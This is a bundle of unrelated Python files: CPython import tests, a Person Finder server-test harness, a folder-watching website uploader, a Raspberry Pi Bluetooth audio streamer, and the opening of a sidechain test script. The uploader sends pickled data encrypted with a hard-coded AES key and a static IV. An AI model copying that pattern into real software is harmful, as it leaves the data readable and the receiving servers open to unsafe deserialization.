os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of this function's peculiar requirements, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
server_tests.py
|
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starts up an appserver and runs end-to-end tests against it.
Instead of running this script directly, use the 'server_tests' shell script,
which sets up the PYTHONPATH and other necessary environment variables.
The actual test cases reside in server_test_cases.py.
Use -k to select particular test classes or methods by a substring match:
tools/server_tests -k ConfigTests
tools/server_tests -k test_delete_and_restore
Specify -v to show the name of each test as it runs (rather than just dots).
Specify -s to see the messages printed by all tests as they run (by default,
stdout/stderr will be captured and then shown only for failing tests).
"""
from __future__ import print_function
import os
import pytest
import re
import signal
import smtpd
import subprocess
import sys
import tempfile
import threading
import time
from model import *
import remote_api
import setup_pf as setup
class ProcessRunner(threading.Thread):
"""A thread that starts a subprocess, collects its output, and stops it."""
READY_RE = re.compile('') # this output means the process is ready
ERROR_RE = re.compile('ERROR|CRITICAL') # output indicating failure
OMIT_RE = re.compile('INFO |WARNING ') # don't bother showing these lines
# this output is for appserver's port error
BIND_RE = re.compile('BindError: Unable to bind (.*):(\d+)')
debug = False # set to True to see all log messages, ignoring OMIT_RE
def __init__(self, name, args):
threading.Thread.__init__(self)
self.name = name
self.args = args
self.process = None # subprocess.Popen instance
self.ready = False # process is running and ready
self.failed = False # process emitted an error message in its output
self.output = []
def run(self):
"""Starts the subprocess and collects its output while it runs."""
self.process = subprocess.Popen(
self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
close_fds=True)
# Each subprocess needs a thread to be watching it and absorbing its
# output; otherwise it will block when its stdout pipe buffer fills.
self.start_watching_output(self.process.stdout)
self.start_watching_output(self.process.stderr)
self.process.wait()
def start_watching_output(self, output):
stdout_thread = threading.Thread(target=self.watch_output, args=(output,))
stdout_thread.setDaemon(True)
stdout_thread.start()
def watch_output(self, output):
while self.process.poll() is None:
line = output.readline()
if not line: # process finished
return
if self.READY_RE.search(line):
self.ready = True
if not self.debug and self.OMIT_RE.search(line): # omit these lines
continue
if self.ERROR_RE.search(line): # something went wrong
self.failed = True
if line.strip():
self.output.append(line.strip('\n'))
def stop(self):
"""Terminates the subprocess and returns its status code."""
if self.process: # started
if self.isAlive(): # still running
os.kill(self.process.pid, signal.SIGINT)
else:
self.failed = self.process.returncode != 0
self.clean_up()
if self.failed:
self.flush_output()
print('%s failed (status %s).\n' % (
self.name, self.process.returncode), file=sys.stderr)
else:
print('%s stopped.' % self.name, file=sys.stderr)
def flush_output(self):
"""Flushes the buffered output from this subprocess to stderr."""
self.output, lines_to_print = [], self.output
if lines_to_print:
sys.stderr.write('\n--- output from %s ---\n' % self.name)
sys.stderr.write('\n'.join(lines_to_print) + '\n\n')
def wait_until_ready(self, timeout=10):
"""Waits until the subprocess has logged that it is ready."""
fail_time = time.time() + timeout
while self.isAlive() and not self.ready and time.time() < fail_time:
for jiffy in range(10): # wait one second, aborting early if ready
if not self.ready:
time.sleep(0.1)
if not self.ready:
self.flush_output() # after each second, show output
if self.ready:
print('%s started.' % self.name, file=sys.stderr)
else:
raise RuntimeError('%s failed to start.' % self.name)
def clean_up(self):
pass
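# Typical lifecycle, as used by PyTestPlugin below: construct a runner with a name and
# an argv list, call start() (the Thread entry point launches the subprocess), call
# wait_until_ready() to block until READY_RE matches its output, then stop() and
# join() it during teardown.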
class AppServerRunner(ProcessRunner):
"""Manages a dev_appserver subprocess."""
READY_RE = re.compile('Starting module "default" running at|Running application')
OMIT_RE = re.compile(
'INFO |WARNING |DeprecationWarning: get_request_cpu_usage')
def __init__(self, port, smtp_port):
self.__datastore_file = tempfile.NamedTemporaryFile()
ProcessRunner.__init__(self, 'appserver', [
os.environ['PYTHON'],
os.path.join(os.environ['APPENGINE_DIR'], 'dev_appserver.py'),
os.environ['APP_DIR'],
'--port=%s' % port,
'--datastore_path=%s' % self.__datastore_file.name,
'--require_indexes',
'--smtp_host=localhost',
'--smtp_port=%d' % smtp_port,
# By default, if we perform a datastore write and then a query, the
# query may run before the write has been applied, so it may not see
# the new data. That matches production behavior, but it is
# inconvenient for server tests, because we often perform a datastore
# write and then check that the result is visible in the web page.
# This flag makes sure that queries see the data once the write has
# been applied.
'--datastore_consistency_policy=consistent',
# When we run local instances, the dev server notices if the SDK is
# out of date, and it stops everything and waits for user input when
# it asks for permission to check; we don't want that to get in the
# way of automated tests.
'--skip_sdk_update_check',
])
def flush_output(self):
"""Flushes the buffered output from this subprocess to stderr."""
self.output, original_output = [], self.output
if original_output:
original_output_text = '\n'.join(original_output)
match = self.BIND_RE.search(original_output_text)
if match:
host = match.group(1)
port = match.group(2)
sys.stderr.write('%s failed: port %s on %s is already in use.\n' %
(self.name, port, host))
sys.stderr.write('Please shut down any local Person Finder ' +
'server or other server test that is running.\n\n')
else:
sys.stderr.write('\n--- output from %s ---\n' % self.name)
sys.stderr.write(original_output_text + '\n\n')
class MailThread(threading.Thread):
"""Runs an SMTP server and stores the incoming messages."""
messages = []
def __init__(self, port):
threading.Thread.__init__(self)
self.port = port
self.stop_requested = False
def run(self):
class MailServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
print('mail from:', mailfrom, 'to:', rcpttos, file=sys.stderr)
MailThread.messages.append(
{'from': mailfrom, 'to': rcpttos, 'data': data})
try:
server = MailServer(('localhost', self.port), None)
except Exception as e:
print('SMTP server failed: %s' % e, file=sys.stderr)
sys.exit(-1)
print('SMTP server started.', file=sys.stderr)
while not self.stop_requested:
smtpd.asyncore.loop(timeout=0.5, count=1)
print('SMTP server stopped.', file=sys.stderr)
def stop(self):
self.stop_requested = True
def wait_until_ready(self, timeout=10):
pass
def flush_output(self):
pass
class PyTestPlugin:
"""A plugin for pytest that does the setup and teardown for server tests."""
def __init__(self):
self.threads = []
def pytest_addoption(self, parser):
group = parser.getgroup(
'server_tests', 'App Engine server testing', after='general')
group.addoption('--server',
help='appserver URL (default: localhost:8081)')
group.addoption('--port', type='int', default=8081,
help='appserver port number (default: 8081)')
group.addoption('--mailport', type='int', default=8025,
help='SMTP server port number (default: 8025)')
def pytest_configure(self, config):
options = config.option
url = options.server or 'localhost:%d' % options.port
secure, host, port, path = remote_api.parse_url(url)
if host == 'localhost':
# We need to start up a clean new appserver for testing.
self.threads.append(AppServerRunner(options.port, options.mailport))
self.threads.append(MailThread(options.mailport))
for thread in self.threads:
thread.start()
for thread in self.threads:
thread.wait_until_ready()
# Connect to the datastore.
remote_api.connect(url, server_type='local')
# Reset the datastore for the first test.
reset_data()
# Give the tests access to configuration information.
config.hostport = '%s:%d' % (host, port)
config.mail_server = MailThread
def pytest_unconfigure(self, config):
for thread in self.threads:
if hasattr(thread, 'flush_output'):
thread.flush_output()
for thread in self.threads:
thread.stop()
thread.join()
def pytest_runtest_setup(self):
MailThread.messages = []
def reset_data():
"""Reset the datastore to a known state, populated with test data."""
setup.reset_datastore()
db.put([
Authorization.create(
'haiti', 'test_key', domain_write_permission='test.google.com'),
Authorization.create(
'haiti', 'domain_test_key',
domain_write_permission='mytestdomain.com'),
Authorization.create(
'haiti', 'reviewed_test_key',
domain_write_permission='test.google.com',
mark_notes_reviewed=True),
Authorization.create(
'haiti', 'not_allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=False),
Authorization.create(
'haiti', 'allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=True),
Authorization.create(
'haiti', 'other_key', domain_write_permission='other.google.com'),
Authorization.create(
'haiti', 'read_key', read_permission=True),
Authorization.create(
'haiti', 'full_read_key', full_read_permission=True),
Authorization.create(
'haiti', 'search_key', search_permission=True),
Authorization.create(
'haiti', 'subscribe_key', subscribe_permission=True),
Authorization.create(
'*', 'global_test_key',
domain_write_permission='globaltestdomain.com'),
# An API key which can be used for SMS API.
Authorization.create(
'*',
'sms_key',
search_permission=True,
domain_write_permission='*'),
])
def monkeypatch_pytest_terminal_reporter():
"""Improves the output produced by _pytest.terminal.TerminalReporter."""
import _pytest.terminal
def write_sep(self, sep, title=None, **markup):
if sep == '_':
markup['cyan'] = 1 # highlight the failed test name in cyan
self._tw.line() # put a blank line before the failure report
self._tw.sep(sep, title, **markup)
_pytest.terminal.TerminalReporter.write_sep = write_sep
if __name__ == '__main__':
monkeypatch_pytest_terminal_reporter()
# Run the tests, using sys.exit to set exit status (nonzero for failure).
sys.exit(pytest.main(plugins=[PyTestPlugin()]))
|
upload_website.py
|
import sys
import re
import os
import socket
import pickle
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad
import threading
import time
AES_ENCRYPTION_KEY = b"N44vCTcb<W8sBXD@"
AES_BLOCKSIZE = 16
AES_IV = b"PoTFg9ZlV?g(bH8Z"
MIN_ARGS_LEN = 3
IP_PATTERN = r'^((1[0-9]{2}|2[0-4][0-9]|25[0-5]|[0-9]{1,2})\.){3}(1[0-9]{2}|2[0-4][0-9]|25[0-5]|[0-9]{1,2})$'
SERVER_PORT = 1337
CHUNK_SIZE = 16384
websites = []
server_ips = []
def validate_args():
'''
This function validates the sys.argv arguments that the user gave to the program.
'''
# Check if the args amount is valid
if len(sys.argv) < MIN_ARGS_LEN:
print('\nError:\tInvalid syntax.')
print('\nUSAGE\n\tpython %s websites_folder_path server_ip [server_ip2 server_ip3 ...]\n' % (__file__))
print('NOTES\n\twebsites_folder_path\tThe folder into which the user can drop website folders to be uploaded.')
print('\tserver_ip\t\tThe ip of the server that the website will be uploaded to.\n')
print('EXAMPLES\n\tSingle server:\t\tpython %s WebsiteExampleFolder 192.168.0.45\n' % (__file__))
print('\tMultiple servers:\tpython %s WebsiteExampleFolder 192.168.0.45 192.168.0.88\n' % (__file__))
return False
# Check if the given path exists
if not os.path.exists(sys.argv[1]):
print('\nError:\tWebsite Folder does not exist.')
print('Try giving an existing folder.\n')
return False
# Check if the given path is a folder
if not os.path.isdir(sys.argv[1]):
print('\nError:\tThe given path is not a folder.')
print('Try giving a path in which website folders will be stored.\n')
return False
# Check if the given IP addresses are valid
for ip_address in sys.argv[2:]:
if re.match(IP_PATTERN, ip_address) is None:
print('\nError:\tInvalid IP address.')
print('Note:\ta.b.c.d, where a-d are numbers between 0-255 (like 172.160.14.0)\n')
return False
return True
def folder_to_json(folder_path):
'''
This function converts the data in a given folder to json format.
The format is:
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [
{
"type" : "file",
"name" : "the name of the file",
"data" : "either textual or binary data"
},
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [...]
},
...
]
}
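A hypothetical inverse helper, json_to_folder, is sketched after this function.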
'''
print(folder_path)
# Make sure that the folder path is in valid format
folder_path = os.path.abspath(folder_path)
# Initialize the folder dictionary
folder_json = {'type' : 'folder', 'name' : os.path.basename(folder_path)}
folder_json['entries'] = []
# For each entry in the current folder
for entry in os.listdir(folder_path):
entry_full_path = folder_path + '/' + entry
# If the entry is a file, save the file's name and data in dictionary
if os.path.isfile(entry_full_path):
file_json = {'type' : 'file', 'name': entry}
# Read the file's bytes and close the handle promptly
with open(entry_full_path, "rb") as entry_file:
    file_json['data'] = entry_file.read()
# Add the file dictionary to the entries of the current folder
folder_json['entries'].append(file_json)
# If the entry is a folder, get the folder's dictionary recursively, and add it
elif os.path.isdir(entry_full_path):
folder_json['entries'].append(folder_to_json(entry_full_path))
return folder_json
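# The receiving server is not part of this file. The sketch below is a
# hypothetical counterpart to folder_to_json(), only illustrating how an
# endpoint could write the decoded structure back to disk; the name
# json_to_folder and the destination_path parameter are assumptions.
def json_to_folder(folder_json, destination_path):
    '''
    Recreate a folder tree from the dictionary produced by folder_to_json().
    '''
    folder_path = os.path.join(destination_path, folder_json['name'])
    os.makedirs(folder_path, exist_ok=True)
    for entry in folder_json['entries']:
        if entry['type'] == 'file':
            # File data is stored as bytes, so write in binary mode
            with open(os.path.join(folder_path, entry['name']), 'wb') as entry_file:
                entry_file.write(entry['data'])
        elif entry['type'] == 'folder':
            json_to_folder(entry, folder_path)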
def send_data_in_chunks(sock, data, chunk_size):
'''
This function sends the given data in chunks of size chunk_size using the given socket.
'''
# Encrypt the data
encrypted_data = encrypt_data(data)
data_length = len(encrypted_data)
print('Data length: %d' % (data_length))
# Walk through the encrypted data in steps of chunk_size bytes,
# sending each full chunk and then whatever remains at the end
for i in range(0, data_length, chunk_size):
data_to_send = encrypted_data[i:i + chunk_size]
sock.send(data_to_send)
print(f"Sent: {len(data_to_send)}")
def encrypt_data(data):
'''
This function uses the Cryptodome.Cipher library to encrypt the given data with the AES algorithm.
Note: a hard-coded key and a static IV are not secure; they are used here only to keep the example simple for educational purposes.
A hypothetical decrypting counterpart is sketched after this function.
'''
# Create an AES cipher object that lets us encrypt our data
# key - The encryption key. Random string hard-coded at the top of the code.
# Note: The same key must be used in the decrypting endpoint; for AES-128 the key must be 16 bytes long.
# IV - The initialization vector for CBC mode.
# Note: The same IV must be used in the decrypting endpoint, and the IV must be 16 bytes long (one AES block).
AES_encryptor = AES.new(AES_ENCRYPTION_KEY, AES.MODE_CBC, AES_IV)
# Pad the data to be in length of a multiple of the AES_BLOCKSIZE
# Encrypt the given data, then return it
return AES_encryptor.encrypt(pad(data, AES_BLOCKSIZE))
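# The decrypting endpoint is not shown in this file; the sketch below is a
# hypothetical counterpart, assuming the receiver uses the same Cryptodome
# primitives with the shared key and IV defined at the top of this file.
from Cryptodome.Util.Padding import unpad
def decrypt_data(encrypted_data):
    '''
    Decrypt data produced by encrypt_data() and strip the PKCS#7 padding.
    '''
    AES_decryptor = AES.new(AES_ENCRYPTION_KEY, AES.MODE_CBC, AES_IV)
    return unpad(AES_decryptor.decrypt(encrypted_data), AES_BLOCKSIZE)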
def upload_website(website_folder_path):
# Convert the given folder to dictionary (json format)
website_folder_json = folder_to_json(website_folder_path)
print('passed')
# Serialize the json for sending
serialized_data = pickle.dumps(website_folder_json)
print(server_ips)
for server_ip in server_ips:
# Initiate connection to endpoint server
connection_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection_socket.connect((server_ip, SERVER_PORT))
# Send the serialized data *length* to the server
connection_socket.send(str(len(serialized_data)).encode())
# Receive an agreement to send the data
agreement = connection_socket.recv(CHUNK_SIZE)
if agreement == b'OK':
# Send the folder data in chunks
send_data_in_chunks(connection_socket, serialized_data, CHUNK_SIZE)
# Rename the folder while the name is already taken
while connection_socket.recv(CHUNK_SIZE) == b'RENAME':
print('Website name "%s" already taken.' % (os.path.basename(website_folder_json['name'])))
new_name = input('Enter new name: ')
website_folder_json['name'] = os.path.join(os.path.dirname(website_folder_json['name']), new_name)
connection_socket.send(b'NEWNAME:' + new_name.encode())
print('Done.')
else:
print('Failed.')
# End the connection with the server
connection_socket.close()
def main():
# Make sure that the format of the arguments is valid
if not validate_args():
return None
# Save the console arguments in variables
global server_ips
server_ips = sys.argv[2:]
websites_folder_path = sys.argv[1]
# Check which websites are already in the websites folder
websites = os.listdir(websites_folder_path)
# Wait for the user to add a folder to the websites folder
while True:
# Check if there's a change in the websites folder
current_websites = os.listdir(websites_folder_path)
if current_websites != websites:
new_websites = []
# Add all the new websites to the list
for website in current_websites:
if website not in websites:
new_websites.append(website)
# For each new website
print(new_websites)
for new_website in new_websites:
# Upload the new website to the target(s)
threading.Thread(target=upload_website, args=(os.path.join(websites_folder_path, new_website),)).start()
# Add the new website to the list of websites
websites.append(new_website)
# Sleep for 1 second
time.sleep(1)
if __name__ == '__main__':
main()
|
main.py
|
import Node as stl
import Scanner as scr
from bluepy.btle import UUID, Scanner, BTLEException
import struct
import sys
import getopt
import math
import random
from collections import deque
from threading import Thread
import os
import argparse
from argparse import ArgumentParser
from subprocess import call
import signal
from signal import SIGPIPE, SIG_DFL
signal.signal(SIGPIPE, SIG_DFL)
if os.getenv('C', '1') == '0':
ANSI_RED = ''
ANSI_GREEN = ''
ANSI_YELLOW = ''
ANSI_CYAN = ''
ANSI_WHITE = ''
ANSI_OFF = ''
else:
ANSI_CSI = "\033["
ANSI_RED = ANSI_CSI + '31m'
ANSI_GREEN = ANSI_CSI + '32m'
ANSI_YELLOW = ANSI_CSI + '33m'
ANSI_CYAN = ANSI_CSI + '36m'
ANSI_WHITE = ANSI_CSI + '37m'
ANSI_OFF = ANSI_CSI + '0m'
queue_audio=deque()
def init_audio(d_out, ff):
global stream
# Make a backup of the original configuration files
call(["cp", "/home/pi/.asoundrc", "/home/pi/.asoundrc_bkp"])
call(["scp", "/etc/asound.conf", "/etc/asound_bkp.conf"])
if ff == 16000:
call(["cp", "./asoundrc_template_16KHz", "/home/pi/.asoundrc"])
call(["scp", "./asoundrc_template_16KHz", "/etc/asound.conf"])
else:
call(["cp", "./asoundrc_template_8KHz", "/home/pi/.asoundrc"])
call(["scp", "./asoundrc_template_8KHz", "/etc/asound.conf"])
import sounddevice as sd
sd.default.channels=1
sd.default.dtype='int16'
devIndex =-1
devF=-1
if d_out == "stl_capture":
devIndex= sd.query_devices().index(sd.query_devices(device="STL_playback"))
devF= sd.query_devices(device="STL_playback")["default_samplerate"]
print("DEVICE: %s INDEX: %s RATE: %s " % ("STL_playback",devIndex, devF))
print(ANSI_CYAN + "MIC DEVICE: %s INDEX: %s RATE: %s CH: %s" %
("STL_capture",sd.query_devices().index(sd.query_devices(device="STL_capture")), devF, sd.default.channels[0])+ ANSI_OFF)
if d_out == "alsa_playback":
devIndex= sd.query_devices().index(sd.query_devices(device="default"))
devF= sd.query_devices(device="STL_playback")["default_samplerate"]
print("DEVICE: %s INDEX: %s RATE: %s " % (sd.query_devices(device="default")["name"],devIndex, devF))
sd.default.device=devIndex
stream = sd.RawOutputStream(samplerate=devF)
do_process = True
def audio_player():
global stream
while True:
if len(queue_audio) >= 20:
play= b''.join(queue_audio)
queue_audio.clear()
stream.write(play)
if not do_process:
break
def audio_getter():
global brd
while True:
brd.mAudio.audio_stream(queue_audio)
if not do_process:
break
def signal_handler(signal, frame):
print('You have pressed Ctrl+C!')
call(["mv", "/home/pi/.asoundrc_bkp", "/home/pi/.asoundrc"])
call(["scp", "/etc/asound_bkp.conf", "/etc/asound.conf"])
call(["rm", "/etc/asound_bkp.conf"])
global do_process
do_process = False
def main():
global brd
global stream
global ff
timeout_sc=2
n_dev=-1
# Instantiate the parser
parser = argparse.ArgumentParser(description='BV_Link_rbpi3 application')
# Required positional argument
parser.add_argument('output_config', type=str, help='[alsa_playback] to playback directly to the speaker. [stl_capture] to create a virtual microphone')
parser.add_argument('freq_config', type=int, help='[16000] to set 16KHz frequency.[8000] to set 8KHz frequency')
args = parser.parse_args()
if args.output_config != "alsa_playback" and args.output_config != "stl_capture":
parser.error("output_config required, type -h to get more information")
if args.freq_config != 16000 and args.freq_config != 8000:
parser.error("freq_config required, type -h to get more information")
#scanning phase
sc=scr.ScanPrint()
print (ANSI_RED + "Scanning for devices..." + ANSI_OFF)
try:
hci0=0
scanner = Scanner(hci0).withDelegate(sc).scan(timeout_sc)
except BTLEException:
hci0=1
scanner = Scanner(hci0).withDelegate(sc).scan(timeout_sc)
devices= sc.getListDev()
if len(devices) > 0:
print("Type the index of device to connect (eg. " + str(devices[0].get('index')) +
" for " + devices[0].get('name') + " device)...")
else:
print("no device found")
exit()
try:
n_dev=int(input('Input:'))
except ValueError:
print (" Not a number")
exit()
if 1 <= n_dev <= len(devices):
print("Valid device")
else:
print("Not a valid device")
exit()
#connection
for d in devices:
if d.get('index') == n_dev:
print( 'Connecting to ' + d.get('name') + "...")
brd = stl.Node(d.get('addr'),d.get('type_addr'))
print("Connected")
brd.syncAudio.enable()
brd.syncAudio.enableNotification()
brd.mAudio.enable()
brd.mAudio.setSyncManager(brd.syncAudio)
brd.mAudio.enableNotification()
init_audio(args.output_config, args.freq_config)
getter = Thread(target=audio_getter)
getter.start()
player = Thread(target=audio_player)
player.start()
print( 'Double tap on SensorTile device (for BVLINK1 FW only) to start audio streaming' )
print( 'Push SW2 button on BlueCoin device (for BVLINK1 FW only) to start audio streaming' )
print( 'Device starts fast blinking when it streams. ' )
print('Press Ctrl+C to exit')
stream.start()
signal.signal(signal.SIGINT, signal_handler)
while True:
if not do_process:
break
try:
brd.waitForNotifications(1.0)
except Exception as e:
pass
del brd
if __name__ == "__main__":
try:
main()
except Exception as e:
# report the error without a full traceback
print("{}: {}".format(type(e).__name__, e))
|
sidechain_interaction.py
|
#!/usr/bin/env python3
"""
Script to test and debug sidechains.
The mainchain exe location can be set through the command line or
the environment variable RIPPLED_MAINCHAIN_EXE
The sidechain exe location can be set through the command line or
the environment variable RIPPLED_SIDECHAIN_EXE
The configs_dir (generated with create_config_files.py) can be set through the command
line or the environment variable RIPPLED_SIDECHAIN_CFG_DIR
"""
import os
import sys
import time
from multiprocessing import Process, Value
from pathlib import Path
from typing import Any, Callable, List
from slk.chain.chain import Chain
from slk.chain.chain_setup import setup_mainchain, setup_sidechain
from slk.chain.context_managers import (
connect_to_external_chain,
sidechain_network,
single_node_chain,
)
from slk.chain.xchain_transfer import main_to_side_transfer, side_to_main_transfer
from slk.classes.config_file import ConfigFile
from slk.repl import start_repl
from slk.sidechain_params import SidechainParams
from slk.utils.eprint import disable_eprint, eprint
from slk.utils.log_analyzer import convert_log
def _simple_test(mc_chain: Chain, sc_chain: Chain, params: SidechainParams) -> None:
try:
bob = sc_chain.create_account("bob")
main_to_side_transfer(
